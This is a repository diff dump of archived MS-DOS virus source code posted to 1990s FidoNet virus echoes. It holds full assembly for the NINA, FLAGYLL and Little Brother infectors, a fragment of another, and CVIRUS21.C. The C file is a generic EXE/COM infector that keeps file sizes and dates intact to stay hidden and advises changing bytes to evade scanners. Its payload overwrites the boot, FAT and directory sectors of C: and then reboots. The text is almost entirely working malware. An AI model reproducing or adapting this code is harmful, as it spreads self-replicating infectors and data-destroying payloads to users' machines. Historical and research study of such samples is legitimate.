MOV DX,OFFSET DATA_12
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,200H
MOV DH,18H
MOV DL,0
INT 10H ; Video display ah=functn 02h
; set cursor location in dx
RETN
MOV AX,4C00H
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
ADD [BP+SI-6563H],AH
CMC ; Complement carry
PUSHF ; Push flags
XCHG DH,CH
MOV DI,DATA_18E
DB 9BH,0F5H,0B2H, 94H, 99H, 81H
DB 0CAH,0D1H
LOC_2:
PUSH AX
MOV AX,CS
ADD AX,1000H
XOR DI,DI ; Zero register
MOV CX,1EFH
MOV SI,OFFSET DS:[100H]
MOV ES,AX
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
MOV AH,1AH
MOV DX,OFFSET DATA_10
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
MOV AH,4EH ; 'N'
MOV DX,OFFSET DATA_4+22H
INT 21H ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
JC LOC_6 ; Jump if carry Set
LOC_3:
MOV AH,3DH ; '='
MOV AL,2
MOV DX,OFFSET DATA_11
INT 21H ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
MOV BX,AX
PUSH ES
POP DS
MOV AX,3F00H
MOV CX,0FFFFH
MOV DX,DATA_16E
INT 21H ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
ADD AX,1EFH
MOV CS:DATA_9,AX
CMP WORD PTR DS:DATA_17E,4459H
JNE LOC_4 ; Jump if not equal
MOV AH,3EH ; '>'
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
PUSH CS
POP DS
MOV AH,4FH ; 'O'
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JC LOC_7 ; Jump if carry Set
JMP SHORT LOC_3 ; (0204)
LOC_4:
XOR CX,CX ; Zero register
MOV DX,CX
MOV AX,4200H
INT 21H ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
JC LOC_5 ; Jump if carry Set
MOV AH,40H ; '@'
XOR DX,DX ; Zero register
MOV CX,CS:DATA_9
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
LOC_5:
MOV AH,3EH ; '>'
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
PUSH CS
POP DS
LOC_6:
MOV AH,1AH
MOV DX,DATA_1E
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
JMP SHORT LOC_10 ; (02B0)
DB 90H
LOC_7:
CLC ; Clear carry flag
XOR CX,CX ; Zero register
PUSH DS
PUSH DX
MOV AH,1AH
MOV DX,OFFSET DATA_10
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
MOV DX,OFFSET DATA_13
MOV AH,4EH ; 'N'
XOR CX,CX ; Zero register
INT 21H ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
JC LOC_6 ; Jump if carry Set
LOC_8:
MOV AH,3CH ; '<'
XOR CX,CX ; Zero register
MOV DX,OFFSET DATA_11
INT 21H ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
MOV BX,AX
JC LOC_6 ; Jump if carry Set
MOV AX,3D02H
MOV DX,OFFSET DATA_11
INT 21H ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
MOV BX,AX
CLC ; Clear carry flag
XOR DX,DX ; Zero register
MOV AH,40H ; '@'
MOV DX,OFFSET DATA_14
MOV CX,5AH
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
CMP AX,5AH
JB LOC_9 ; Jump if below
MOV AH,3EH ; '>'
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
JC LOC_9 ; Jump if carry Set
MOV AH,4FH ; 'O'
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JNC LOC_8 ; Jump if carry=0
LOC_9:
MOV AX,4C00H
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
LOC_10:
XOR DI,DI ; Zero register
MOV SI,OFFSET DATA_15
MOV CX,22H
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
POP BX
MOV CS:DATA_7,0
MOV WORD PTR CS:DATA_7+2,ES
POP BX
JMP DWORD PTR CS:DATA_7
DATA_15 DB 1EH
DB 07H,0B9H,0FFH,0FFH,0BEH,0EFH
DB 02H,0BFH, 00H, 01H, 2BH,0CEH
DB 0F3H,0A4H, 2EH,0C7H, 06H, 00H
DB 01H, 00H, 01H, 2EH, 8CH, 1EH
DB 02H, 01H, 8BH,0C3H, 2EH,0FFH
DB 2EH, 00H, 01H,0CDH
DB 20H
HYDRA8 ENDP
SEG_A ENDS
END START
;-+- FidoPCB v1.4 [NR]
; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/L Specify library search paths
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

187
MSDOS/Virus.MSDOS.Unknown.vir45.asm Normal file
View File

@ -0,0 +1,187 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 35 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : NINA.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37)
;* To : Viral Doctor
;* Subj : NINA.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
.model tiny
.code
org 100h
; Disassembly done by Dark Angel of Phalcon/Skism
; for 40Hex Number 9, Volume 2 Issue 5
start:
push ax
mov ax,9753h ; installation check
int 21h
mov ax,ds
dec ax
mov ds,ax ; ds->program MCB
mov ax,ds:[3] ; get size word
push bx
push es
sub ax,40h ; reserve 40h paragraphs
mov bx,ax
mov ah,4Ah ; Shrink memory allocation
int 21h
mov ah,48h ; Allocate 3Fh paragraphs
mov bx,3Fh ; for the virus
int 21h
mov es,ax ; copy virus to high
xor di,di ; memory
mov si,offset start + 10h ; start at MCB:110h
mov cx,100h ; (same as PSP:100h)
rep movsb
sub ax,10h ; adjust offset as if it
push ax ; originated at 100h
mov ax,offset highentry
push ax
retf
endfile dw 100h ; size of infected COM file
highentry:
mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the
; memory isn't freed when the
; program terminates
mov ax,3521h ; get int 21h vector
int 21h
mov word ptr cs:oldint21,bx ; save it
mov word ptr cs:oldint21+2,es
push es
pop ds
mov dx,bx
mov ax,2591h ; redirect int 91h to int 21h
int 21h
push cs
pop ds
mov dx,offset int21
mov al,21h ; set int 21h to virus vector
int 21h
pop ds ; ds->original program PSP
pop bx
push ds
pop es
return_COM:
mov di,100h ; restore original
mov si,endfile ; file
add si,di ; adjust for COM starting
mov cx,100h ; offset
rep movsb
pop ax
push ds ; jmp back to original
mov bp,100h ; file (PSP:100)
push bp
retf
exit_install:
pop ax ; pop CS:IP and flags in
pop ax ; order to balance the
pop ax ; stack and then exit the
jmp short return_COM ; infected COM file
int21:
cmp ax,9753h ; installation check?
je exit_install
cmp ax,4B00h ; execute?
jne exitint21 ; nope, quit
push ax ; save registers
push bx
push cx
push dx
push ds
call infect
pop ds ; restore registers
pop dx
pop cx
pop bx
pop ax
exitint21:
db 0eah ; jmp far ptr
oldint21 dd ?
infect:
mov ax,3D02h ; open file read/write
int 91h
jc exit_infect
mov bx,ax
mov cx,100h
push cs
pop ds
mov ah,3Fh ; Read first 100h bytes
mov dx,offset endvirus
int 91h
mov ax,word ptr endvirus
cmp ax,'MZ' ; exit if EXE
je close_exit_infect
cmp ax,'ZM' ; exit if EXE
je close_exit_infect
cmp word ptr endvirus+2,9753h ; exit if already
je close_exit_infect ; infected
mov al,2 ; go to end of file
call move_file_pointer
cmp ax,0FEB0h ; exit if too large
ja close_exit_infect
cmp ax,1F4h ; or too small for
jb close_exit_infect ; infection
mov endfile,ax ; save file size
call write
mov al,0 ; go to start of file
call move_file_pointer
mov dx,100h ; write virus
call write
close_exit_infect:
mov ah,3Eh ; Close file
int 91h
exit_infect:
retn
move_file_pointer:
push dx
xor cx,cx
xor dx,dx
mov ah,42h
int 91h
pop dx
retn
write:
mov ah,40h
mov cx,100h
int 91h
retn
db 'Nina'
endvirus:
int 20h ; original COM file
end start
;-+- Terminate 1.50/Pro
; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/yx Extended memory swapping
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

268
MSDOS/Virus.MSDOS.Unknown.vir46.asm Normal file
View File

@ -0,0 +1,268 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 36 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : FLAGYLL.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 17:38)
;* To : Bill Dirks
;* Subj : FLAGYLL.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org
;FLAGYLL virus - edited for Crypt Newsletter 13
;FLAGYLL is a memory resident, overwriting virus which
;infects and destroys .EXE files on load.
;It updates the infected files time/date stamps to the time of
;infection so it can easily be followed.
;.EXE's infected by FLAGYLL are destroyed. DOS will either
;refuse to load them or FLAGYLL will become resident
;as they execute. These programs are ruined and can only
;be deleted. Because it is so destructive to files, FLAGYLL cannnot
;pose a threat in the wild, and in this respect, it is much
;inferior to the SUSAN virus included in this issue.
.radix 16
cseg segment
model small
assume cs:cseg, ds:cseg, es:cseg
org 100h
oi21 equ endflagyll
filelength equ endflagyll - begin
nameptr equ endflagyll+4
DTA equ endflagyll+8
begin: jmp install_flagyll
; install
install_flagyll:
mov ax,cs ; reduce memory size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last memory
jne cancel ; block
mov ax,ds:[0003]
sub ax,100 ; decrease memory
mov ds:0003,ax
copy_flagyll:
mov bx,ax ; copy to claimed block
mov ax,es ; PSP
add ax,bx ; virus start in memory
mov es,ax
mov cx,offset endflagyll - begin ; cx = length of virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin] ; point to start of virus
lea di,es:0100 ; point to destination
rep movsb ; copy virus in memory
hook_21:
mov ds,cx ; hook interrupt 21h
mov si,0084h ;
mov di,offset oi21
mov dx,offset check_exec
lodsw
cmp ax,dx ;
je cancel ; exit, if already installed
stosw
movsw
push es
pop ds
mov ax,2521h ; revector int 21h to virus
int 21h
cancel: ret
check_exec: ; look over loaded files
pushf ; for executables
push es ; push everything onto the
push ds ; stack
push ax
push bx
push dx
cmp ax,04B00h ; is a file being
; executed ?
jne abort ; no, exit
do_infect:
call infect ; then try to infect
abort: ; restore everything
pop dx
pop bx
pop ax
pop ds
pop es
popf
exit:
; exit
jmp dword ptr cs:[oi21]
infect:
jmp over_id ; it's a vanity thing
note: db '-=[Crypt Newsletter 13]=-'
over_id:
mov cs:[name_seg],ds ; this routine
mov cs:[name_off],dx ; essentially grabs
; the name of the file
cld ; clear direction flags
mov word ptr cs:[nameptr],dx ; save pointer to the filename
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ; get old DTA
int 21h
push es
push bx
push cs ; set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21h
call host_ident ; find filename for virus
push di
mov si,offset COM_txt ; is extension 'COM' ?
mov cx,3
rep cmpsb
pop di
jz return ; if so, let it pass by
mov si,offset EXE_txt ; is extension .EXE ?
nop
mov cl,3
rep cmpsb
jnz return
do_exe: ; infect host, destroying it
mov ax,4300h ; clear attributes
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
int 21h
and cl,0FEh
mov ax,4301h
int 21h
mov ds,cs:[name_seg] ; open file read/write
mov dx,cs:[name_off]
mov ax,3D02h
int 21h
jc close_file
push cs
pop ds
mov [handle],ax
mov bx,ax
push cs
pop ds
mov ax,4200h ;set pointer to beginning of host
push cs
pop ds
mov bx,[handle] ;handle to BX
xor cx,cx
xor dx,dx
int 21h
mov ah,40 ;write to file
mov cx,filelength ;virus length in cx
mov dx,100 ;start write at beginning of Flagyll
int 21h ;do it
close_file: mov bx,[handle]
mov ah,03Eh ;close file, name -->BX
int 21h
mov ax,4C00h ;exit to DOS
int 21h
return: mov ah,1Ah
pop dx ; restore old DTA
pop ds
int 21H
ret ; let DOS regain control
host_ident: les di,dword ptr cs:[nameptr] ; finds filename for
mov ch,0FFh ; host selection
mov al,0
repnz scasb
sub di,4
ret
EXE_txt db 'EXE',0 ; extension masks
COM_txt db 'COM',0 ; for host selection
name_seg dw ? ;data buffers for
name_off dw ? ; viral use on the fly
handle dw ?
note2: db 'Flagyll' ; virus name
endflagyll:
cseg ends
end begin
;-+- GEcho 1.10+
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/3 Enable 32-bit processing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

247
MSDOS/Virus.MSDOS.Unknown.vir47.asm Normal file
View File

@ -0,0 +1,247 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 37 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : LTBRO299.DSM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Alan Jones, 2:283/718 (06 Nov 94 17:40)
;* To : Daniel Hendry
;* Subj : LTBRO299.DSM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Alan.Jones@f718.n283.z2.fidonet.org
;Little Brother - resident companion virus, 299 bytes.
;This virus stores itself inside DOS's data block, over the root directory
;copy. It hooks int 21h, function 4bh (subfunct. 0, load & exec) and
;creates a function 0deh for self identification. When a file is run,
;it first checks to see if it is a COM or an EXE. If it is an EXE, it
;will create a COM file with the same filename. Otherwise - if it is a
;COM, it will check to see if it is the virus by checking the size of the
;file and seeing if there is an EXE with the same (starting) filename.
;If so, it will change the filename to be run to the EXE host and allow
;DOS to execute it. This virus may cause errors (?) due to the place
;in memory it locates itself.
;Disassembly by Black Wolf.
.model tiny
.code
org 100h
start_virus:
cld
mov ax,0DEDEh ;Installation Check
int 21h
cmp ah,41h
je Exit_Virus ;If there - terminate
mov ax,44h
mov es,ax
mov di,100h ;Copy virus to 0044:0100
mov si,di ;Root directory entries?
mov cx,end_virus-start_virus ;This is inside DOS data
rep movsb ;block... may cause errors?
mov ds,cx ;DS = 0 = Interrupt table
mov si,84h ;0:84h = Int 21h entry in table
mov di,offset Old21_IP ;Save old Int 21h address
movsw
movsw
push es
pop ds ;Set DS to new seg...
mov dx,offset Int21_Handler
mov ax,2521h
int 21h ;Hook Int 21h.
Exit_Virus:
retn ;Terminate
EXE_Mask db 'EXE',0
COM_Mask db 'COM',0
CritErrHandler:
mov al,3
iret
Int21_Handler:
pushf
cmp ax,0DEDEh ;Is this an installation
je Install_Check ;check call?
push dx bx ax ds es ;Save regs....
cmp ax,4B00h ;Is it load and execute?
jne Exit_21h ;No... exit handler
call Infect_File ;Yes... infect file
Exit_21h:
pop es ds ax bx dx
popf
jmp dword ptr cs:[Old21_IP] ;Jump to Old Int 21h
Install_Check:
mov ax,4101h
popf
iret
Infect_File:
cld
mov word ptr cs:[Filename_off],dx ;Save filename offset
mov word ptr cs:[Filename_seg],ds ;and segment.
push cs
pop ds
mov dx,offset VirusDTA
mov ah,1Ah
int 21h ;Set DTA to us...
call Find_Extension
mov si,offset ds:[EXE_Mask]
mov cx,3
repe cmpsb ;Is it an EXE file?
jnz Not_EXE
mov si,offset COM_Mask
call Change_Ext ;Change extension to COM
mov ax,3300h
int 21h ;Get Ctrl-Break Status
push dx ;Save it....
xor dl,dl
mov ax,3301h
int 21h ;Disable Ctrl-Break.
mov ax,3524h
int 21h ;Get Int 24h handler's address
push bx
push es ;Save it for later...
push cs
pop ds ;DS = virus segment
mov dx,offset CritErrHandler
mov ax,2524h
int 21h ;Set Critical Error handler.
lds dx,dword ptr ds:[Filename_Off] ;DS:DX = filename
xor cx,cx ;Reg attributes
mov ah,5Bh
int 21h ;Create File..
jc Done_Infect
xchg ax,bx
push cs
pop ds
mov cx,end_virus-start_virus
mov dx,100h
mov ah,40h
int 21h ;Write entire virus
cmp ax,cx ;did it all write?
pushf
mov ah,3Eh ;Close file.
int 21h
popf
jz Done_Infect ;Yes, go Done_Infect
lds dx,dword ptr ds:[Filename_Off]
mov ah,41h
int 21h ;Delete file, incomplete
;write or write error.
Done_Infect:
pop ds
pop dx
mov ax,2524h
int 21h ;Restore Critical error handler
pop dx ;Get old CTRL-Break handler
mov ax,3301h ;status and restore it.
int 21h
mov si,offset EXE_Mask
call Change_Ext ;Change extension back to orig.
Leave_Infect:
retn
Not_EXE:
call Locate_File
cmp word ptr cs:[24dh], end_virus-start_virus
jne Leave_Infect ;Is the file size right for Virus?
mov si,offset EXE_Mask ;If so, is there an EXE of the same
call Change_Ext ;name as the COM file?
call Locate_File
jnc Leave_Infect ;If not exit, otherwise - is already
mov si,offset COM_Mask ;infected, so change extension
jmp short Change_Ext ;to run uninfected program.
Locate_File:
lds dx,dword ptr ds:[Filename_Off]
mov cl,27h
mov ah,4Eh
int 21h ;Find First Filename match.
retn
Change_Ext:
call Find_Extension
push cs
pop ds
movsw
movsw
retn
Find_Extension:
les di,dword ptr cs:[Filename_Off]
mov ch,0FFh
mov al,2Eh ;Scan through filename until a '.'
repne scasb
retn
Virus_Name db 'Little Brother',0
end_virus:
Old21_IP dw ?
Old21_CS dw ?
Filename_Off dw ?
Filename_Seg dw ?
VirusDTA:
end start_virus
;-+- FMail 0.96â
; + Origin: **SERMEDITECH BBS** Soissons FR (+33) 23.73.02.51 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/v Include full symbolic debug information
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

255
MSDOS/Virus.MSDOS.Unknown.vir48.c Normal file
View File

@ -0,0 +1,255 @@
/*Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
Msg : 38 of 54
From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
To : - *.* - Fri 11 Nov 94 08:10
Subj : CVIRUS21.C
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.RealName: Max Ivanov
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
* Kicked-up by MeteO (2:5030/136)
* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
* From : Clif Jessop, 2:283/718 (06 Nov 94 17:40)
* To : Mike Salvino
* Subj : CVIRUS21.C
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
@RFC-Path:
ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
18.n283!not-for-mail
@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org
C-Virus: A generic .COM and .EXE infector
Written by Nowhere Man
October 2, 1991
Version 2.1
*/
#include <dir.h>
#include <dos.h>
#include <fcntl.h>
#include <io.h>
#include <stdio.h>
/* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM
file which CVIRUS can infect without increasing the size of the
file. (Since this would tip off the victim to CVIRUS's presence, no
file under this size will be infected.) It should be set to the
approximate size of the LZEXEd .EXE file produced from this code, but
always a few bytes larger. Why? Because this way CVIRUS doesn't need
to check itself for previous infection, saving time.
SIGNATURE is the four-byte signature that CVIRUS checks for to prevent
re-infection of itself.
*/
#ifdef DEBUG
#define TOO_SMALL 6000
#else
#define TOO_SMALL 4735
#endif
#define SIGNATURE "NMAN"
/* The following is a table of random byte values. Be sure to constantly
change this to prevent detection by virus scanners, but keep it short
(or non-exsistant) to keep the code size down.
*/
char screw_virex[] = "\xF5\x23\x72\x96\x54\xFA\xE3\xBC\xCD\x04";
void hostile_activity(void)
{
/* Put whatever you feel like doing here...
I chose to make this routine trash the victim's boot, FAT,
and directory sectors, but you can alter this code however you want,
and are encouraged to do so.
*/
#ifdef DEBUG
puts("\aAll files infected!");
exit(1);
#else
/* Overwrite five sectors, starting with sector 0, on C:, with the
memory at location DS:0000 (random garbage).
*/
abswrite(2,5,0,(void *) 0);
__emit__(0xCD, 0x19); // Reboot computer
#endif
}
int infected(char *fname)
{
/* This function determines if fname is infected. It reads four
bytes 28 bytes in from the start and checks them agains
the current header. 1 is returned if the file is already infected,
0 if it isn't.
*/
register int handle;
char virus_signature[35];
static char check[] = SIGNATURE;
handle = _open(fname, O_RDONLY);
_read(handle, virus_signature,
sizeof(virus_signature));
close(handle);
#ifdef DEBUG
printf("Signature for %s: %.4s\n", fname, &virus_signature[28]);
#endif
/* This next bit may look really stupid, but it actually saves about
100 bytes.
*/
return((virus_signature[30] == check[2]) && (virus_signature[31] ==
check[3]));
}
void spread(char *virus, struct ffblk *victim)
{
/* This function infects victim with virus. First, the victim's
attributes are set to 0. Then the virus is copied into the victim's
file name. Its attributes, file date/time, and size are set to that
of the victim's, preventing detection, and the files are closed.
*/
register int virus_handle, victim_handle;
unsigned virus_size;
char virus_code[TOO_SMALL + 1], *victim_name;
/* This is used enought to warrant saving it in a separate variable */
victim_name = victim->ff_name;
#ifdef DEBUG
printf("Infecting %s with %s...\n", victim_name, virus);
#endif
/* Turn off all of the victim's attributes so it can be replaced */
_chmod(victim_name, 1, 0);
#ifdef DEBUG
puts("Ok so far...");
#endif
/* Recreate the victim */
virus_handle = _open(virus, O_RDONLY);
victim_handle = _creat(victim_name, victim->ff_attrib);
/* Copy virus */
virus_size = _read(virus_handle, virus_code, sizeof(virus_code));
_write(victim_handle, virus_code, virus_size);
#ifdef DEBUG
puts("Almost done...");
#endif
/* Reset victim's file date, time, and size */
chsize(victim_handle, victim->ff_fsize);
setftime(victim_handle, (struct ftime *) &victim->ff_ftime);
/* Close files */
close(virus_handle);
close(victim_handle);
#ifdef DEBUG
puts("Infection complete!");
#endif
}
struct ffblk *victim(void)
{
/* This function returns a pointer to the name of the virus's next
victim. This routine is set up to try to infect .EXE and .COM
files. If there is a command line argument, it will try to
infect that file instead. If all files are infected, hostile
activity is initiated...
*/
register char **ext;
static char *types[] = {"*.EXE", "*.COM", NULL};
static struct ffblk ffblk;
int done;
for (ext = (*++_argv) ? _argv : types; *ext; ext++)
{
for (ext = (*++_argv) ? _argv : types; *ext; ext++)
{
done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM |
FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week, months,
etc.... here is the place to insert the code (don't forget to
"#include <time.h>").
*/
if ((ffblk.ff_fsize > TOO_SMALL) && (!infected(ffblk.ff_name)))
return(&ffblk);
done = findnext(&ffblk);
}
}
}
/* If there are no files left to infect, have a little fun */
hostile_activity();
return(0);
}
int main(int argc, char *argv[])
{
/* In the main program, a victim is found and infected. If all files
are infected, a malicious action is performed. Otherwise, a bogus
error message is displayed, and the virus terminates with code
1, simulating an error.
*/
char *err_msg[] = { "Out of memory",
"Bad EXE format",
"Invalid DOS version",
"Bad memory block",
"FCB creation error",
"Sharing violation",
"Abnormal program termination",
"Divide error",
};
char *virus_name;
spread(argv[0], victim());
puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]);
return(1);
}
/*-+- GEcho 1.00
+ Origin: Stop creating them! Virusses aren't great! (2:283/718)
=============================================================================
Yoo-hooo-oo, -!
þ The MeÂeO
/d Warn if duplicate symbols in libraries
--- Aidstest Null: /Kill
* Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)*/

224
MSDOS/Virus.MSDOS.Unknown.vir49.asm Normal file
View File

@ -0,0 +1,224 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 39 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
